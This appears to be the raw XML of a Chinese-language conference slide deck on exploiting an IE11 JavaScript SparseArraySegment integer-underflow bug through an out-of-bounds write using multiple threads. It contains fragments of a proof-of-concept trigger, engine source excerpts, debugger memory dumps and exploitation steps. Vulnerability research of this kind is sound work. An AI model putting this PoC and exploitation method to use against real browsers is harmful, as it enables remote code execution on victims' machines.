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47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1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305" r:id="rId3"/>
    <p:sldId id="297" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="295" r:id="rId7"/>
    <p:sldId id="301" r:id="rId8"/>
    <p:sldId id="296" r:id="rId9"/>
    <p:sldId id="300" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="284" r:id="rId12"/>
    <p:sldId id="303" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="286" r:id="rId15"/>
    <p:sldId id="287" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="304" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="290" r:id="rId21"/>
    <p:sldId id="291" r:id="rId22"/>
    <p:sldId id="294" r:id="rId23"/>
    <p:sldId id="259" r:id="rId24"/>
    <p:sldId id="263" r:id="rId25"/>
    <p:sldId id="261" r:id="rId26"/>
    <p:sldId id="264" r:id="rId27"/>
    <p:sldId id="265" r:id="rId28"/>
    <p:sldId id="302" r:id="rId29"/>
    <p:sldId id="266" r:id="rId30"/>
    <p:sldId id="268" r:id="rId31"/>
    <p:sldId id="271" r:id="rId32"/>
    <p:sldId id="279" r:id="rId33"/>
    <p:sldId id="258" r:id="rId34"/>
    <p:sldId id="267" r:id="rId35"/>
    <p:sldId id="272" r:id="rId36"/>
    <p:sldId id="273" r:id="rId37"/>
    <p:sldId id="275" r:id="rId38"/>
    <p:sldId id="276" r:id="rId39"/>
    <p:sldId id="277" r:id="rId40"/>
    <p:sldId id="283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75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462" y="-102"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2175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2019/5/20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  <a:t>‹#›</a:t>
            </a:fld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826408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866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997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tags" Target="../tags/tag12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tags" Target="../tags/tag20.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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tags" Target="../tags/tag18.xml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9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2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tags" Target="../tags/tag25.xml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4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方案0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813098" y="243840"/>
            <a:ext cx="986155" cy="94996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de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518525" y="3863340"/>
            <a:ext cx="4099560" cy="3498215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="方案0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813098" y="243840"/>
            <a:ext cx="986155" cy="94996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  <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr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2019/5/20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1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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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4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2019/5/20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4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865952" y="2498845"/>
            <a:ext cx="11187678" cy="110799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多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" b="1" dirty="0" smtClean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线程利用浏览器越界写漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="6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805305" y="4008755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</a:rPr>
              <a:t>墨云</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>科技李克萌</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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2837127" y="534027"/>
            <a:ext cx="51090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dirty="0"/>
              <a:t>多线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>利用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>挑战</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926401" y="2133600"/>
            <a:ext cx="1054627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1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>直观感觉，有更多内存被拿来越界写，越容易成功。怎么构造大量连续的内存？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>exploit+shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>执行是需要花费时间的，他们能够在崩溃之前执行完吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19203303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85640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IE11 JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>SparseArraySegment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>整数下溢出漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>poc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p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106033" y="1894704"/>
            <a:ext cx="328665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漏洞触发环境：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Windows7 sp1 32bit+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>IE11(KB3124275)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502023" y="1022008"/>
            <a:ext cx="6741459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=[];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=[];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12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]=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12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DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f1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sz="28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(){};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 err="1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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj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={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altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1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() {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13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]=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16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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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;}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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>splice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obj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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse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altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sort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f1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endParaRPr lang="en-US" altLang="zh-CN" sz="28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33285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78121" y="418795"/>
            <a:ext cx="8493212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Var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JavascriptArray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::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ReverseHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>（）</a:t>
            </a:r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endParaRPr lang="en-US" altLang="zh-CN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SparseArraySegmentBase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*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pArr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-&gt;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head</a:t>
            </a:r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altLang="zh-CN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-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&gt;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((uint32)length) - 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-&gt;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left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+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-&gt;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length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/>
            </a:r>
            <a:b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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next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prevSeg</a:t>
            </a:r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altLang="zh-CN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size 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=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min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(size, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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MaxArrayLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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- left);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062681" y="318460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0:008&gt; dd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>eax（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>JavascriptArray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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04d47100  648eb1fc 04d34980 00000000 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04d47110  0000000e 04d47128 04d47128 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04d47120  00000001 00000000 00000000 0000000f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04d47130  00000010 00000000 04d47080 04d47080</a:t>
            </a:r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2809103" y="1902942"/>
            <a:ext cx="1169773" cy="195236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V="1">
            <a:off x="4781339" y="1879516"/>
            <a:ext cx="1169773" cy="222631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V="1">
            <a:off x="6033247" y="1879516"/>
            <a:ext cx="1305214" cy="2324931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361386" y="5084136"/>
            <a:ext cx="11485837" cy="138499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javascriptarray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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并没有考虑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a2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US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13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]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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对数组长度的影响</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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zh-CN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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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JavascriptArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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ReverseHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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（）中，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Seg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>被下溢出成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0xffffffff,size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>被设置成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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33012" y="3184606"/>
            <a:ext cx="31197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13-2+3=14=0xe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>13+1-2+3=15=0xf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8239107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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461386" y="1176409"/>
            <a:ext cx="59757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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ClearElements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(elements + (index - left), size - (index - left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1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07536" y="2666164"/>
            <a:ext cx="93913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SparseArraySegment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&lt;T&gt;::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ClearElements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out_ecount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Field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(T)* elements, uint32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T fill =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SparseArraySegment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&lt;T&gt;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::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GetMissingItem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zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uint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&lt;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elements[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 = fill;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460570" y="979316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0:008&gt; dd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>eax（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascriptarray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04790100  69bab1fc 046b2fe0 00000000 00000005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04790110  0000000e 047980a0 047980a0 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04790120  00000001 00000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ffffffff 0000000f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>04790130  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 00000000 00000021 00000019</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接箭头连接符 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3696932" y="4073587"/>
            <a:ext cx="349622" cy="71356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360629" y="4733425"/>
            <a:ext cx="214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0xfffffffb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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接箭头连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2842856" y="4604636"/>
            <a:ext cx="0" cy="71356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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782642" y="5318200"/>
            <a:ext cx="2587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0x80000002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172621" y="361184"/>
            <a:ext cx="741728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dirty="0" err="1"/>
              <a:t>SparseArraySegment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>整数下溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>漏洞分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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245716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86730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IE11 JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SparseArraySegment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>整数下溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604682" y="1416423"/>
            <a:ext cx="97826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 smtClean="0"/>
              <a:t>Poc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>中的数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>a2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>被越界写了，数组可自定义成任意长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>类似于找到了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>dst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value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>）的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604682" y="2591566"/>
            <a:ext cx="38942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 smtClean="0"/>
              <a:t>Dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>=a2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" u="sng" dirty="0" smtClean="0"/>
              <a:t>Value=0x80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" u="sng" dirty="0" smtClean="0"/>
              <a:t>Length=0xfffffffb</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362635" y="4161226"/>
            <a:ext cx="74317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0547ba18  67b7274e 00000000 04040000 00203000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ChildEBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RetAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 0547ba3c 67cc0283 KERNELBASE!VirtualAlloc+0x19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>01 0547ba54 67cc0358 jscript9!PageAllocator::AllocSegment+0x35</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>02 0547ba70 67bc9c04 jscript9!PageAllocator::Alloc+0x3d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>03 0547ba9c 67bc9e76 jscript9!LargeHeapBucket::AddLargeHeapBlock+0x5d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>04 0547bab4 67bc9e07 jscript9!Recycler::TryLargeAlloc+0x4f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>05 0547badc 67dd13ad jscript9!Recycler::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>LargeAlloc+0x1b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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065265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8416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多线程利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>IE11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>数组越界写漏洞步骤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55700" y="1461247"/>
            <a:ext cx="875030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zh-CN" altLang="zh-CN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申请较多连续内存，并且让被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溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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堆块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位于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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连续内存的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前面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" kern="1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sz="28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 New</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800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一个新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线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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触发漏洞，于此同时，主线程进入“等待状态”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" kern="1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；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" kern="1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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800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触发漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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后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，会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连续越界写；与此同时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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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主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线程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正在检测内存是否有溢出；当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2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zh-CN" altLang="en-US" sz="2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主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线程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检测到溢出之后，马上执行</a:t>
            </a:r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exploit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工作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566980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87238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多线程利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>IE11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>越界写漏洞：</a:t>
            </a:r>
